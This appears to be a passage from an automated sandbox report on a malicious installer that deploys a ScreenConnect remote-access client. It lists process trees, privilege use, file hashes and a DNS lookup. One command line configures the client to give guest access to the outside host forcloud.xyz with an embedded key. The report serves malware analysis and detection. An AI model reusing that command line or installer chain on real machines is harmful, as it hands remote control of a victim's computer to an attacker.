| Token: SeEnableDelegationPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeImpersonatePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeCreateGlobalPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Volume Shadow Copy service COM API
Processes
| Process | Command Line |
| C:\Users\Admin\AppData\Local\Temp\5c0bf98f428ac235e9ed18951af08b5da721d7f1074097544ffbc55b9c51d6b3.exe | "C:\Users\Admin\AppData\Local\Temp\5c0bf98f428ac235e9ed18951af08b5da721d7f1074097544ffbc55b9c51d6b3.exe" |
| C:\Windows\SysWOW64\msiexec.exe | "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\20ae101cef0f1acf\setup.msi" |
| C:\Windows\system32\msiexec.exe | C:\Windows\system32\msiexec.exe /V |
| C:\Windows\syswow64\MsiExec.exe | C:\Windows\syswow64\MsiExec.exe -Embedding 5C29DD8C86517DFCD91C05D0DF17F412 C |
| C:\Windows\SysWOW64\rundll32.exe | rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSICCD1.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_259509893 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments |
| C:\Windows\system32\vssvc.exe | C:\Windows\system32\vssvc.exe |
| C:\Windows\system32\DrvInst.exe | DrvInst.exe "1" "200" "STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot19" "" "" "61530dda3" "0000000000000000" "0000000000000528" "0000000000000538" |
| C:\Windows\syswow64\MsiExec.exe | C:\Windows\syswow64\MsiExec.exe -Embedding A7853CBA27FEFCF5DC54A76EC1857646 |
| C:\Windows\syswow64\MsiExec.exe | C:\Windows\syswow64\MsiExec.exe -Embedding DBF948C7C9C0247417A48442C2D91ADE M Global\MSI0000 |
| C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe | "C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=forcloud.xyz&p=8041&s=eef8a2dd-7cdd-4d96-ac88-046f110ebda2&k=BgIAAACkAABSU0ExAAgAAAEAAQChADX0VDCOYpzw3rHL2%2fWsmDfp2rMCOwlBz1eCGgD2Oi1gRuiacwZcRKSZxBYWgdfGxDbYoeGqdwtpMoqlG8JOF4ZKxVYt9zhvvQIB5ire7%2fRFo81g3%2b6hxkPJc0INqs%2bXruwq1z%2b6smxQSCBb%2fykHDHW7AhbHyK65sNB5aK02%2bPswsU904ncQII1vFx60s4CJ8ilr9kIfJWyMgG0RDnaKSCV6gAU5oDSV8wZ3CFUrC2FZNJ8A0Fkfb5xYiK39FBIivzP4vYfAruNnluqWCCrM3hrKooHc9G96dlUI6y4avh5vYzfNXEaIxQvrLqzjTpAdRhiVwzF5SgOywQIOk%2bC5&t=JacekK&c=PL&c=&c=&c=&c=&c=&c=&c=" |
| C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe | "C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe" "RunRole" "1822f744-8df6-4c3d-b674-6fab8b91cc3f" "User" |
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | forcloud.xyz | udp |
Files
C:\Users\Admin\AppData\Local\Temp\ScreenConnect\20ae101cef0f1acf\setup.msi
| MD5 | 6ebb0b130daf468e91c095bf931388cb |
| SHA1 | c503cd29966246a33d6b8196c4788e4d83dffa09 |
| SHA256 | 824fd5fc45bc205cc73a9545c396bfaebaa5460d93eeac2aff049bc11c2036f0 |
| SHA512 | e8d2153f8709f22f28fdb8b6867c2f3c7f6abc4180a44cd35eeb277ef09f181ab0a08c53de309aa641498d6208a20bd0d842c0bedead22d4df9ae4f95ff6bdc0 |
C:\Users\Admin\AppData\Local\Temp\MSICCD1.tmp
| MD5 | 845b0569d54305e62c6e8ffe198d217c |
| SHA1 | cd06c3d1554fe08099ada4f4448a23a6422e6234 |
| SHA256 | 4da6c507c746cd07ca4546e723d0d145bbf4d26ff8de13f1a0750ef323a89a2e |
| SHA512 | af45bb8199f2af323b9954da0d11eed51459708608d356bc40bd9d9189c02c2c902f533077724dd7c6a7068e564b5c8f621ef1032098cef26ed26d5bf26e23fe |
\Users\Admin\AppData\Local\Temp\MSICCD1.tmp-\Microsoft.Deployment.WindowsInstaller.dll
| MD5 | 5ef88919012e4a3d8a1e2955dc8c8d81 |
| SHA1 | c0cfb830b8f1d990e3836e0bcc786e7972c9ed62 |
| SHA256 | 3e54286e348ebd3d70eaed8174cca500455c3e098cdd1fccb167bc43d93db29d |
| SHA512 | 4544565b7d69761f9b4532cc85e7c654e591b2264eb8da28e60a058151030b53a99d1b2833f11bfc8acc837eecc44a7d0dbd8bc7af97fc0e0f4938c43f9c2684 |
\Users\Admin\AppData\Local\Temp\MSICCD1.tmp-\ScreenConnect.InstallerActions.dll
| MD5 | 9260afe4bbde2549fc0b92f657c2e50a |
| SHA1 | 5580778a62b06d7b56d3f788727514551de31647 |
| SHA256 | 588d3a5e1b91d3756f74ea61c9c1b5f7871af924fab469cebb579f8aeb2fc135 |
| SHA512 | afce644ee04813e1e323b719e8ad3cfefe6e20ad0aa821f1325b8e0ae0144a7cff4e0f1f4b6f45df33f060392f94bcfd88d62b2218fd0bc573d65a20d80e968b |
\Users\Admin\AppData\Local\Temp\MSICCD1.tmp-\ScreenConnect.Core.dll
| MD5 | 3b1ba4bebefdc8a95b0f2f0b4e50c527 |
| SHA1 | 15551d2e8bfb829f3a96d161b43de820c0d417ce |
| SHA256 | a843b3a4549c43ef5bd8470cacf5d2f0f3b3c8110441fcc10079facc7db3de29 |
| SHA512 | f41595586cd5330537f5f02b392310b028e36f618e2583d125430ecd103ebbf6d2cf6befcfb1b32279eeb9fd7ef018f49131e3906fb61bc324da85d93a9a18c7 |
\Users\Admin\AppData\Local\Temp\MSICCD1.tmp-\ScreenConnect.Windows.dll
| MD5 | d196174cf03f86c8776e717f07d5d19f |
| SHA1 | bbd2c6a59229b3e4ec7c5742248f3f55a61dd216 |
| SHA256 | a1edd67a131505cc84d76601474c53874a56b5437b835838e4a866e20f6cd264 |
| SHA512 | cf4d159bcb42a1a7ea03f8877736cace109ae79998906b9178c74f7a9b63030cddc2bc94ef6c5f718e99c2d0039cf3589f8c4f2bf5b67db94b3b96d2c988b45b |
C:\Windows\Installer\MSI2EDE.tmp
| MD5 | ba84dd4e0c1408828ccc1de09f585eda |
| SHA1 | e8e10065d479f8f591b9885ea8487bc673301298 |
| SHA256 | 3cff4ac91288a0ff0c13278e73b282a64e83d089c5a61a45d483194ab336b852 |
| SHA512 | 7a38418f6ee8dbc66fab2cd5ad8e033e761912efc465daa484858d451da4b8576079fe90fd3b6640410edc8b3cac31c57719898134f246f4000d60a252d88290 |
C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe
| MD5 | 826314610d9e854477b08666330940b5 |
| SHA1 | 65b601d60042cf6f263cd38ac2f63cd06a9de159 |
| SHA256 | e54963cb63c9e471e2d3d59e55e4c7aeedccafdd616b99c4b3af230608e4bcc9 |
| SHA512 | 5c01d6de25d60eb6b1eb72b7fa6401b71153c2a740c41aeeb2bd302cc4e80f5c1a388b647ee16da196705ac8edbc60abda49b9a531517bb85959cc018fb5d1fb |
C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.dll
| MD5 | 3ff07c657068430ef677181d1f67066d |
| SHA1 | 37f7e9d2ccb65b4ea2733393015635ea1b43393e |
| SHA256 | d17cf13612039f6a4ca17b56c32399ccbe279a499c8d2f8e910b1fd6f4fff2b1 |
| SHA512 | 5552208b5649ceac2b32510ea12d409a85643d27e6a9c335e049195a507ae9211aee77574376fde059747998b60ae041e191635a67c3461585aba7f9b877b095 |
C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\app.config
| MD5 | 095c85acc658f0733bc6941163ec234c |
| SHA1 | 298c53608e02cac620702cb6abe75c70560c03b1 |
| SHA256 | 8e3dc9d06b282a536e1af7806d7f434d5738d4932dae557ccd762bfeed0bfc11 |
| SHA512 | fe3fbe2bcd2baabcf192663dd7603cce1db1025a9d40ad98598d5441d892efc0c94aa41fe61256762538e0ed3bcc3e7958cdbf87c2d577ee3bdd561597635d03 |
C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\system.config
| MD5 | f7f74a2053a7c858ed989f07f81b9720 |
| SHA1 | dc585c95c643e7a6b3cbb63a080e660ffebbc7b9 |
| SHA256 | fe4d54400c7fae8710be0b9040d18e78bdde3a53953629275ce40ebdcd05d7b2 |
| SHA512 | fefcef4f03b7c52346bc789f95968f26adb889a6a891eb6d782afe9c38d2571d8c703d0ad4382304a208cb44132fcfc4cdec4b5259cae6d0ba560b0ac4480043 |
C:\Config.Msi\f7829a2.rbs
| MD5 | cc0bcbfc6d61e31bf3c6e080162ad5dc |
| SHA1 | be94ede063f4410ed5c5b934efd2d633f5c294e7 |
| SHA256 | 534de8301ba505a045576f09d2943c624d6e6ba87edcd38b5e24bf6992063ba5 |
| SHA512 | dd4341dfe8d907f70db45dc6819d6afda2fe032477361523de40454ec9715817e7c248c851cb10a91caba0bed7601000e24e2d7f06a607e736d640eed036fdc0 |
\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Client.dll
| MD5 | f311a8217807f6c85817058522e234a2 |
| SHA1 | ceb586b3cf7b0ee86ea8242d9b3d8641c9444cd1 |
| SHA256 | 032450cd037d9e0eec49e0b4ff44073d539775633fb4af6fd76d4cb19116aac9 |
| SHA512 | 5ef1f6b595af9cc7f788680ac3f3e9b8b12baafe734a8e2f675baa57f5ef2c69806492911bda54f11c5a4b8cf3cced82cfc6e0ecf214e45083e9f9aa6a83d039 |
C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsAuthenticationPackage.dll
| MD5 | 5adcb5ae1a1690be69fd22bdf3c2db60 |
| SHA1 | 09a802b06a4387b0f13bf2cda84f53ca5bdc3785 |
| SHA256 | a5b8f0070201e4f26260af6a25941ea38bd7042aefd48cd68b9acf951fa99ee5 |
| SHA512 | 812be742f26d0c42fdde20ab4a02f1b47389f8d1acaa6a5bb3409ba27c64be444ac06d4129981b48fa02d4c06b526cb5006219541b0786f8f37cf2a183a18a73 |
C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsCredentialProvider.dll
| MD5 | be74ab7a848a2450a06de33d3026f59e |
| SHA1 | 21568dcb44df019f9faf049d6676a829323c601e |
| SHA256 | 7a80e8f654b9ddb15dda59ac404d83dbaf4f6eafafa7ecbefc55506279de553d |
| SHA512 | 2643d649a642220ceee121038fe24ea0b86305ed8232a7e5440dffc78270e2bda578a619a76c5bb5a5a6fe3d9093e29817c5df6c5dd7a8fbc2832f87aa21f0cc |
C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\Client.en-US.resources
| MD5 | 511202ed0ba32d7f09eab394c917d067 |
| SHA1 | dbd611720fd1730198f72dec09e8e23e6d6488f8 |
| SHA256 | f8398a235b29af6569f2b116e0299b95512d042f5a4cd38c98c79729a5fbdb9d |
| SHA512 | f04b08938f3ebf8cfa1a1157a94da3ae4699494bdce566619afa5b13a8f6ebe556d522c064e5ea02e343b59a489343f77e3ea2bb2ea390aae35a626f41cadc77 |
C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\Client.resources
| MD5 | 5cd580b22da0c33ec6730b10a6c74932 |
| SHA1 | 0b6bded7936178d80841b289769c6ff0c8eead2d |
| SHA256 | de185ee5d433e6cfbb2e5fcc903dbd60cc833a3ca5299f2862b253a41e7aa08c |
| SHA512 | c2494533b26128fbf8149f7d20257d78d258abffb30e4e595cb9c6a742f00f1bf31b1ee202d4184661b98793b9909038cf03c04b563ce4eca1e2ee2dec3bf787 |
\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe
| MD5 | ab5fa8d90645878d587f386d0e276c02 |
| SHA1 | a602a20735a1104851f293965f1fe4ab678bf627 |
| SHA256 | 316bbf433f1f803d113adf060c528ccc636656cee26b90f5fea011c1c73c7d16 |
| SHA512 | a181e23c8fa01bc1d9f0f9f95a5ca6112e2b61f34f4c1da696d3ccabbbd942bcc81a3f4a60921328a6020d28aed8711c22be33761cb685921d50fea8b1d7b986 |
C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe.config
| MD5 | 728175e20ffbceb46760bb5e1112f38b |
| SHA1 | 2421add1f3c9c5ed9c80b339881d08ab10b340e3 |
| SHA256 | 87c640d3184c17d3b446a72d5f13d643a774b4ecc7afbedfd4e8da7795ea8077 |
| SHA512 | fb9b57f4e6c04537e8fdb7cc367743c51bf2a0ad4c3c70dddab4ea0cf9ff42d5aeb9d591125e7331374f8201cebf8d0293ad934c667c1394dc63ce96933124e7 |